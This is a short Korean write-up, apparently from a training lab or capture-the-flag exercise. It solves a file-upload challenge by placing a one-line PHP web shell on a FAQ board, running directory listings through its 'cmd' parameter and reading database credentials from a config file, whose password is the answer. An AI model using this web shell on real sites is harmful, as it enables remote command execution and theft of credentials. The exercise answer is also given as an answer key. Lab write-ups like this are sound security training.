==================================
* 파일 업로드 문제 08번
==================================
[풀이과정]

1. 풀이 과정
1> FAQ 게시판에 php 파일을 업로드하고 파일이 존재하는 경로를 확인했다.
https://lab.eqst.co.kr:8085/exam31/lib/file/faq/afaf.php
웹쉘은 <?php echo shell_exec($_GET['cmd']); ?>를 사용했다.

2> 위의 경로에 ?cmd=ls%20../../../ 와 같이 입력하여 db정보가 들어있는 경로를 찾았다. 
dw.php
lib
process
property.php
property.txt

3> 위의 파일 중에서 property.php 안에 real db 정보가 존재했고, 플래그를 찾을 수 있었다.
	/* RealDB	*/	
	define( "db_host" , "127.0.0.1" ); 
	define( "db_user" , "db_con_user" );
	define( "db_pass" , "web_shell_upload" ); 
	define( "db_db" , "webshell_db" );

2. 정답
web_shell_upload
==================================

